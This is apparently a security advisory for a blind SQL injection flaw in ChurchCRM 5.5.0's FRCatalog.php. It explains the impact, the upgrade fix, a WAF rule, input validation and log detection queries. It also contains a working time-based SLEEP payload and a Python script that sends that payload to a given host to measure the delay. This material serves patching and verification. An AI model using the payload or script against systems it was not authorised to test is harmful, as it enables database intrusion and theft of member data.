CVE-2024-25897
📋 TL;DR
ChurchCRM 5.5.0 contains a blind SQL injection vulnerability in FRCatalog.php via the CurrentFundraiser GET parameter. An attacker can use it to extract data from the backing database through timing differences (one true/false answer per request) and, depending on the privileges of the database account, to issue further SQL statements. All ChurchCRM 5.5.0 installations with the fundraising module enabled are affected.
💻 Affected Systems
- ChurchCRM
📦 What is this software?
ChurchCRM is an open-source church management system written in PHP on a MySQL/MariaDB database; FRCatalog.php is part of its fundraising module.
⚠️ Risk & Real-World Impact
Worst Case
Complete database compromise, including sensitive member data, authentication credentials (password hashes) and financial records, and, where the database account holds file-write privileges such as MySQL FILE, potential code execution on the host through database functions.
Likely Case
Data exfiltration of sensitive information including user credentials, personal data, and financial records from the ChurchCRM database.
If Mitigated
Limited impact: with strict integer validation on the parameter and WAF rules blocking SQL injection patterns, exploitation attempts are rejected and logged rather than reaching the database.
🎯 Exploit Status
Exploitation is time-based blind SQL injection (responses differ only in timing, not in content). It requires no authentication and can be automated with standard SQL injection tooling such as sqlmap, so unpatched Internet-facing installations should be treated as exploitable.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.5.1 or later
Vendor Advisory: https://github.com/ChurchCRM/CRM/issues/6856
Restart Required: No
Instructions:
1. Back up the ChurchCRM installation and its database.
2. Download the 5.5.1 (or later) release from the official ChurchCRM repository.
3. Upgrade the whole installation rather than copying a single FRCatalog.php into 5.5.0; a file taken from a newer release may depend on other changes in that release.
4. Verify the fix by re-testing the CurrentFundraiser parameter (see How to Verify below).
🔧 Temporary Workarounds
WAF Rule Implementation
Implement web application firewall rules to block SQL injection patterns in the CurrentFundraiser GET parameter. This is a stopgap: signature-based detection such as libinjection can be bypassed, and if you run the OWASP Core Rule Set its SQLi rules should already cover this parameter.
# Example ModSecurity rule (choose an id that does not clash with your rule set):
SecRule ARGS_GET:CurrentFundraiser "@detectSQLi" "id:1001,phase:2,t:none,t:urlDecodeUni,deny,status:403,log,msg:'SQL injection attempt in CurrentFundraiser'"
Input Validation Filter
Add input validation that rejects anything but an integer in the CurrentFundraiser parameter before it reaches the query, and use the validated value, not the raw $_GET entry, in the query. This reduces exposure but is not a substitute for upgrading.
# PHP example:
$currentFundraiser = filter_input(INPUT_GET, 'CurrentFundraiser', FILTER_VALIDATE_INT);
if ($currentFundraiser === null || $currentFundraiser === false) {
    // null: parameter absent; false: present but not an integer
    http_response_code(400);
    exit('Invalid parameter');
}
// from here on use $currentFundraiser (an int), never $_GET['CurrentFundraiser']
🧯 If You Can't Patch
- Disable or restrict access to the fundraising module if it is not required (for example, deny FRCatalog.php at the web server or limit it to an authenticated, allow-listed set of users).
- Implement network segmentation to isolate the ChurchCRM server from sensitive systems.
🔍 How to Verify
Check if Vulnerable:
Against a test system you are authorized to probe, request the CurrentFundraiser parameter with a time-based payload (URL-encoded when sent) such as: /FRCatalog.php?CurrentFundraiser=1' AND SLEEP(5)-- - (the trailing "-- -" matters: MySQL only treats -- as a comment when whitespace follows it). Compare with a baseline request such as CurrentFundraiser=1; a response that consistently arrives about 5 seconds later than the baseline indicates the injection. A single slow response proves nothing, so repeat both requests several times.
Check Version:
Check ChurchCRM version in admin panel or view source for version metadata.
Verify Fix Applied:
Repeat the same payload after patching: the response should return in baseline time with no added delay, and a non-numeric CurrentFundraiser value should be rejected rather than processed.
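The before/after timing comparison described above, written out as an added example that is not part of the original advisory or of ChurchCRM. The decision logic compares medians of several baseline and several payload timings rather than trusting one request; probe() is a hypothetical helper that only touches the network when you call it with the base URL of a host you are authorized to test, and the two timing sets at the bottom are constructed to show what an unpatched and a patched host look like.

```python
import statistics
import time
import urllib.error
import urllib.request
from urllib.parse import quote

SLEEP_SECONDS = 5
BASELINE_VALUE = "1"
# The advisory's payload, terminated with "-- -" because MySQL needs whitespace after "--".
DELAYED_VALUE = f"1' AND SLEEP({SLEEP_SECONDS})-- -"


def looks_delayed(baseline_times, payload_times, sleep_seconds=SLEEP_SECONDS, tolerance=0.6):
    """True when the median payload latency exceeds the median baseline latency by at least
    tolerance * sleep_seconds. Medians over several samples keep one slow or one cached
    response from producing a false positive or a false negative."""
    if len(baseline_times) < 3 or len(payload_times) < 3:
        raise ValueError("need at least three samples per group")
    delta = statistics.median(payload_times) - statistics.median(baseline_times)
    return delta >= tolerance * sleep_seconds


def probe(base_url, value, timeout=30):
    """Time one GET of FRCatalog.php with CurrentFundraiser=value (hypothetical helper).
    A 4xx/5xx or a timeout still yields a timing sample: a WAF or the fix may reject the payload."""
    url = f"{base_url.rstrip('/')}/FRCatalog.php?CurrentFundraiser={quote(value, safe='')}"
    start = time.monotonic()
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except OSError:  # URLError, HTTPError and socket timeouts all derive from OSError
        pass
    return time.monotonic() - start


def check_target(base_url, samples=5):
    """Collect baseline and payload timings from a live host. Returns (delayed, baseline, payload)."""
    baseline = [probe(base_url, BASELINE_VALUE) for _ in range(samples)]
    payload = [probe(base_url, DELAYED_VALUE) for _ in range(samples)]
    return looks_delayed(baseline, payload), baseline, payload


# Constructed timings in seconds: an unpatched host (payload requests sleep ~5 s) and a patched one.
UNPATCHED_TIMINGS = ([0.21, 0.19, 0.25, 0.22, 0.20], [5.24, 5.19, 5.31, 5.22, 5.27])
PATCHED_TIMINGS = ([0.21, 0.19, 0.25, 0.22, 0.20], [0.23, 0.20, 0.24, 0.22, 0.26])

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:  # e.g. python verify.py https://churchcrm.example/churchcrm
        delayed, baseline, payload = check_target(sys.argv[1])
        print("delay observed:", delayed, "baseline:", baseline, "payload:", payload)
    else:
        print("unpatched sample ->", looks_delayed(*UNPATCHED_TIMINGS))
        print("patched sample   ->", looks_delayed(*PATCHED_TIMINGS))
```

The 0.6 tolerance means a host only counts as delayed when the payload adds at least three of the requested five seconds, which tolerates jitter on a loaded server without accepting ordinary slowness as evidence.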
📡 Detection & Monitoring
Log Indicators:
- Unusually long response times for FRCatalog.php requests (for example clusters of responses near 5 or 10 seconds where the page normally answers in well under a second)
- Repeated requests with SQL keywords, quote characters or comment sequences in the CurrentFundraiser parameter, including percent-encoded forms, or any non-numeric value at all
- Application or database error logs showing SQL syntax errors originating from FRCatalog.php
Network Indicators:
- HTTP requests containing SQL injection patterns in GET parameters
- Unusual traffic patterns to FRCatalog.php endpoint
SIEM Query:
source="web_logs" AND uri_path="/FRCatalog.php" AND (query_string="*SLEEP*" OR query_string="*WAITFOR*" OR query_string="*BENCHMARK*")
(If this runs in Splunk, wildcard matches are case-insensitive. Apply it to the URL-decoded query string, since payloads are usually percent-encoded, and add a second rule that flags any FRCatalog.php request whose CurrentFundraiser value is not purely numeric.)